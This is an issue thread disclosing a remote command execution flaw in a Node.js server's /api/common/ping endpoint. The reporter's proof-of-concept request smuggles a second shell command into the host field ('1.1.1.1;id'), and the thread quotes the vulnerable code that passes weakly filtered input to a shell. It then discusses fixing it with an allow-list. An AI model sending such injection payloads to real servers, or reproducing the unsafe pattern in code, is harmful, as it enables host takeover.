[Security] Remote command execution

[edoardottt]

Using the API /api/common/ping it's possible to achieve remote command execution on the host machine. This leads to complete control over the machine hosting the server.

To reproduce the vulnerability:

• Download the repo
• Execute node index.js
• Login
• Execute this request as shown below:

HTTP request:

POST /api/common/ping HTTP/1.1
Host: 0.0.0.0:8000
User-Agent: bla-bla-bla
Cookie: your-auth-cookie
Content-Length: 15

host=1.1.1.1;id

This is the vulnerable code:

	schema.addWorkflow('ping', function($) {
		var host = $.model.host.replace(/'|"|\n/g, '');
		Exec('ping -c 3 {0}'.format(host), $.done(true));
	});

Here the problem is the fact that the server doesn't sanitize correctly the input checking that the host provided is a legitimate one, allowing also characters like ;, | or &.

[petersirka]

With the code you can edit everything or you can run bash scripts directly. But I agree, this must be sanitised. I'll fix it.

[edoardottt]

Awesome. Someone could disable functionalities, but that api isn't intended to provide rce.

Thanks @petersirka

[petersirka]

@Will-create can you look at this again? https://github.com/totaljs/code/issues/20

[edoardottt]

if that field should accept only IPs, why not using a specific regex only for IPs?

[petersirka]

if that field should accept only IPs, why not using a specific regex only for IPs?

The domain name and IP address can be pinged. It is therefore impossible to have an IP validator alone.

[edoardottt]

Got it. In general an allow-list is preferred over a block-list of entries. In this case the regex must check that only the allowed characters are entered: alphabetic characters (A-Z), numeric characters (0-9), the minus sign (-), and the period (.)